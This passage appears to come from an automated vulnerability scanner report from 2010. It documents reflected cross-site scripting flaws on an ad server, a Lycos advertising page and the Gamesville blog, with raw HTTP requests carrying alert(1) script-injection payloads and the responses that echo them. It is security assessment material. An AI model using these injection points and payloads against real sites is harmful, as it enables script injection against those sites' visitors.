GET /adj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;ord=5241744? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 435 Date: Sun, 12 Dec 2010 14:26:39 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.idg_b2c/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3623'-alert(1)-'5d6c2e0b2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 439 Date: Sun, 12 Dec 2010 14:26:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57e3'-alert(1)-'64cfe680192 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?e57e3'-alert(1)-'64cfe680192 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 436 Date: Sun, 12 Dec 2010 14:26:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93955'-alert(1)-'f68ab19aedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;ord=123456789? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 446 Date: Sun, 12 Dec 2010 14:26:39 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/idgt.lycos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e41'-alert(1)-'e57b49161fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 450 Date: Sun, 12 Dec 2010 14:26:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a4b'-alert(1)-'bb4ad577c5f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 447 Date: Sun, 12 Dec 2010 14:26:38 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d086f'-alert(1)-'0c5afc10a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 12 Dec 2010 14:26:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7161
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-75049847_1292163999","http://ad.doubleclick.net/adjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;net=idgt;u=,idgt-75049847_1292163999,,webdevelopment,;;tile=1;cmw=owl;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f15f'-alert(1)-'146c6c088c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 12 Dec 2010 14:26:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7153
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-61396396_1292163999","http://ad.doubleclick.net/adj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;net=idgt;u=,idgt-61396396_1292163999,,webdevelopment,;;tile=1;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
3.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/idgt.lycos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c5'-alert(1)-'3504f397cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;&717c5'-alert(1)-'3504f397cdd=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 12 Dec 2010 14:26:57 GMT Content-Length: 7117 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... pt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-96303716_1292164017","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-96303716_1292164017,,none,;;tile=1;sz=728x90;net=idgt;&717c5'-alert(1)-'3504f397cdd=1;contx=none;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49010'-alert(1)-'a3461bb3ff4 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos/;tile=49010'-alert(1)-'a3461bb3ff4 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 12 Dec 2010 14:26:38 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7074
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-3700236_1292163998","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-3700236_1292163998,,none,;;tile=49010'-alert(1)-'a3461bb3ff4;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842fd"><script>alert(1)</script>7285f314683 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images842fd"><script>alert(1)</script>7285f314683 HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images842fd"><script>alert(1)</script>7285f314683&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce66"><script>alert(1)</script>ebf8b4cdc1d was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&cat=images HTTP/1.1 Host: advertising.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15554
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
3.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.gamesville.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc939"><script>alert(1)</script>3fc3efe8798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc939\"><script>alert(1)</script>3fc3efe8798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bc939"><script>alert(1)</script>3fc3efe8798=1 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64783
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e58b"><script>alert(1)</script>e67fb4e0f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e58b\"><script>alert(1)</script>e67fb4e0f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b"><script>alert(1)</script>e67fb4e0f35=1 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62622
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e28c3"><script>alert(1)</script>c1dd954abbb was submitted in the REST URL parameter 3. This input was echoed as e28c3\"><script>alert(1)</script>c1dd954abbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3"><script>alert(1)</script>c1dd954abbb HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 12 Dec 2010 14:27:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28969
3.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b54dd"><script>alert(1)</script>f9d8de1e657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b54dd\"><script>alert(1)</script>f9d8de1e657 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd"><script>alert(1)</script>f9d8de1e657=1 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62703
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d07"><script>alert(1)</script>d04b7f19c87 was submitted in the REST URL parameter 3. This input was echoed as b2d07\"><script>alert(1)</script>d04b7f19c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07"><script>alert(1)</script>d04b7f19c87 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 12 Dec 2010 14:27:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28970
3.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2ca"><script>alert(1)</script>f7c5056a9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d2ca\"><script>alert(1)</script>f7c5056a9c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca"><script>alert(1)</script>f7c5056a9c8=1 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Link: <http://blog.gamesville.com/?p=3110>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 38975
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba0d"><script>alert(1)</script>f2dc20303b2 was submitted in the REST URL parameter 3. This input was echoed as 4ba0d\"><script>alert(1)</script>f2dc20303b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d"><script>alert(1)</script>f2dc20303b2 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 12 Dec 2010 14:27:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29057
3.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40d3"><script>alert(1)</script>221b93386cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e40d3\"><script>alert(1)</script>221b93386cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3"><script>alert(1)</script>221b93386cc=1 HTTP/1.1 Host: blog.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 X-Pingback: http://blog.gamesville.com/xmlrpc.php Link: <http://blog.gamesville.com/?p=3114>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46248
